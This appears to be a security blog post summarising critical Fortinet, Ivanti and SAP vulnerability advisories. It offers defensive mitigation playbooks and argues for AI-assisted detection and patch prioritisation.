Urgent Patches for Fortinet, Ivanti, and SAP—and How AI Helps You Stay Ahead

A CVSS 9.8 and 9.9 isn’t just a “high severity” label—it’s a countdown timer. This week’s patch alerts from Fortinet, Ivanti, and SAP are a familiar pattern: authentication bypass paths, code execution routes, and “it’s not enabled by default” footnotes that don’t help the organizations that enabled the feature months ago and forgot.

Here’s what most companies get wrong: they treat urgent patching as a calendar problem (“Can we fit this into the next change window?”) instead of an exposure problem (“Are we already being probed, and can we spot it fast?”). That’s where AI in cybersecurity earns its keep—not by replacing patching, but by shrinking the time between new exploit signal and your response.

This post breaks down what’s happening in the Fortinet, Ivanti, and SAP advisories, why these vulnerability classes keep recurring, and the practical ways AI-powered security monitoring can help you detect exploitation attempts, prioritize fixes, and reduce blast radius when patching can’t happen instantly.

What the new patches tell us (and why it matters)

These advisories share a simple message: identity and execution paths are still the fastest way to own an environment. The specifics differ, but the attacker outcomes are consistent—get in without valid authentication, then run code or hijack privileged sessions.

Fortinet: SAML signature verification mistakes become login bypasses

Fortinet addressed two critical issues—CVE-2025-59718 and CVE-2025-59719 (both CVSS 9.8)—tied to improper verification of a cryptographic signature. In plain terms: if FortiCloud SSO login is enabled, a crafted SAML message can allow an unauthenticated attacker to bypass FortiCloud SSO admin authentication.

Yes, the feature is not enabled by default. No, that isn’t comforting. In real networks, features get enabled during rollouts, troubleshooting, or “temporary” configurations that become permanent.

Immediate mitigation (before patching): disable FortiCloud SSO admin login if you don’t need it. This is exactly the kind of “reduce exposed surface now, patch next” move that saves weekends.

Ivanti Endpoint Manager: stored XSS that turns admin consoles into entry points

Ivanti shipped fixes for multiple Endpoint Manager (EPM) vulnerabilities, including CVE-2025-10573 (CVSS 9.6): a stored XSS issue allowing a remote unauthenticated attacker to execute JavaScript in the context of an admin session.

The interesting (and worrying) part is the exploitation path described by researchers: attackers can join fake managed endpoints to poison the admin dashboard with malicious JavaScript. The “user interaction required” detail doesn’t lower real risk—admins have to use the console to do their jobs.

Ivanti states it’s not aware of in-the-wild exploitation at the time of the advisory. That doesn’t mean you can wait. It means you have a short window to patch before opportunistic scanning and copycat exploitation ramps.

SAP: critical code injection, Tomcat issues, and deserialization risk

SAP’s December security updates include 14 vulnerabilities, with three critical items worth calling out:

• CVE-2025-42880 (CVSS 9.9): code injection in SAP Solution Manager
• CVE-2025-55754 (CVSS 9.6): multiple vulnerabilities in Apache Tomcat within SAP Commerce Cloud
• CVE-2025-42928 (CVSS 9.1): deserialization vulnerability in SAP jConnect SDK for Sybase ASE

SAP Solution Manager is central plumbing in many SAP landscapes. If attackers gain a foothold there, lateral movement and credential access become a lot easier. For many enterprises, SAP is “too important to change quickly,” which is exactly why attackers like it.

The common thread: verification failures and trust abuse

The surface details vary—SAML messages, device reports, Java deserialization—but the root cause is familiar: systems trusted something they shouldn’t.

• Signature verification flaws (Fortinet, and one Ivanti patch-management component issue) often show up when implementations accept malformed tokens, skip validation steps, or mishandle certificate chains.
• Stored XSS (Ivanti) is a trust problem in UI pipelines: untrusted input becomes trusted script.
• Deserialization and code injection (SAP) are trust problems in execution pipelines: untrusted input becomes executable logic.

A good security program assumes these mistakes will keep happening—because they will. The winning move is building operations that can:

1. Detect early exploit signals (often before a vendor confirms “exploited in the wild”)
2. Prioritize patching by active exposure, not by CVSS alone
3. Contain quickly when patching is delayed

This is where AI can be legitimately useful.

Where AI actually helps: faster detection, smarter prioritization

AI doesn’t magically “prevent CVEs.” What it can do is reduce your mean time to know and mean time to respond—especially when your environment includes firewalls, endpoint managers, and business-critical SAP systems.

1) AI-powered anomaly detection around authentication paths

For flaws like the Fortinet SSO bypass, you’re watching for abnormal authentication sequences and SAML behavior.

AI-driven detection can help by:

• Modeling normal admin login patterns (source IPs, times, geographies, device fingerprints)
• Flagging unusual SSO token use (sudden spikes, odd IdP metadata, new assertion structures)
• Correlating failed logins + configuration changes + new admin sessions into one incident narrative

A practical stance I’ve found effective: treat your identity plane like production payment traffic. If something “rare” happens (new admin login from a new ASN at 3:12 a.m.), you don’t wait for certainty—you triage immediately.

2) AI to prioritize patches by reachable exposure

Most patch queues fail because they’re ordered by severity, not by exploitability in your environment.

AI-assisted vulnerability management can score urgency using signals like:

• Is the vulnerable feature enabled (e.g., FortiCloud SSO admin login)?
• Is the asset internet-facing or reachable from untrusted networks?
• Are there active probes in your logs matching known exploit patterns?
• Does the system sit on a high-trust junction (EPM core, SAP Solution Manager)?

A simple rule that beats many “criticality” spreadsheets:

Patch what attackers can reach first, not what auditors can read first.

3) AI-driven triage that cuts alert noise during patch weekends

December is peak “skeleton crew” season in many orgs. When a critical advisory hits on a Friday, you need an operations model that works with fewer people.

Security copilots and AI triage workflows can help by:

• Summarizing raw events into one incident storyline
• Suggesting likely affected systems based on CMDB + telemetry
• Drafting containment steps (block rules, isolation actions, identity revocations)

The point isn’t automation for its own sake. It’s keeping humans focused on decisions that matter: isolate, patch, rotate credentials, verify integrity.

Practical playbooks for Fortinet, Ivanti, and SAP environments

Here’s how I’d run this in an enterprise SOC that wants speed without chaos.

Fortinet playbook: reduce SSO exposure, then hunt

Do now (hours):

• Confirm whether FortiCloud SSO admin login is enabled anywhere.
• Disable it temporarily where not required.
• Restrict admin interfaces to management networks/VPN only.

AI-assisted hunting ideas (same day):

• Look for new admin sessions preceded by unusual SSO assertions or atypical request sizes.
• Baseline “normal” admin login sources; flag outliers.
• Correlate admin login anomalies with config export, policy changes, and new local accounts.

Ivanti EPM playbook: treat the console as a high-value target

Do now (hours):

• Patch to EPM 2024 SU4 SR1 where possible.
• If patching is delayed, restrict access to the EPM web service and admin console.

AI-assisted hunting ideas (same day):

• Detect new “devices” registering at abnormal rates or from unusual subnets.
• Alert on unexpected script-like patterns in fields that typically hold device metadata.
• Monitor admin session behavior for signs of hijacking (sudden privilege actions, token reuse, abnormal user-agent changes).

Containment stance: assume that if an admin loads a poisoned dashboard, session takeover is the goal. Have a fast path to revoke sessions and rotate admin credentials.

SAP playbook: prioritize the central nodes

Do now (24–48 hours):

• Identify whether SAP Solution Manager is present and how it’s segmented.
• Apply SAP’s December patches with special urgency for the critical CVEs.
• Validate that Java stacks embedding Tomcat are mapped and owned (this is where patching often stalls).

AI-assisted monitoring ideas:

• Detect unusual authenticated activity against SAP Solution Manager function modules.
• Flag anomalous remote execution indicators on SAP application hosts (new processes, unusual outbound connections).
• Correlate SAP auth events with endpoint telemetry for “login + tool execution” patterns.

“People also ask” (quick, direct answers)

Does “not enabled by default” mean we’re safe?

No. Enterprise deployments rarely match factory defaults. You need configuration validation and continuous monitoring.

If a vulnerability requires user interaction (like an admin viewing a dashboard), is it lower risk?

Not in practice. If the interaction is part of normal operations, it’s highly likely to occur—especially for admins.

Can AI replace patching?

No. AI helps you detect, prioritize, and respond faster. The fix is still patching (or disabling the vulnerable feature).

What to do next: a tight 72-hour plan

If you want a concrete approach that fits real enterprise constraints, use this 72-hour plan:

1. Inventory and exposure check (Day 1): confirm which Fortinet/Ivanti/SAP assets are deployed, internet-reachable, and feature-enabled.
2. Temporary controls (Day 1–2): disable risky features, tighten admin access paths, add monitoring rules for exploit signals.
3. Patch and verify (Day 2–3): patch in priority order by reachability and trust level; verify with post-patch validation and targeted hunts.

Urgent patches like these are exactly why the AI in Cybersecurity conversation matters. Not because AI makes vulnerabilities disappear, but because it shortens the gap between vendor disclosure and your containment. That gap is where breaches happen.

If you had to choose one place to invest before the next round of critical advisories: would you rather add another approval step to change management—or build AI-powered detection that tells you, with evidence, which system is being targeted right now?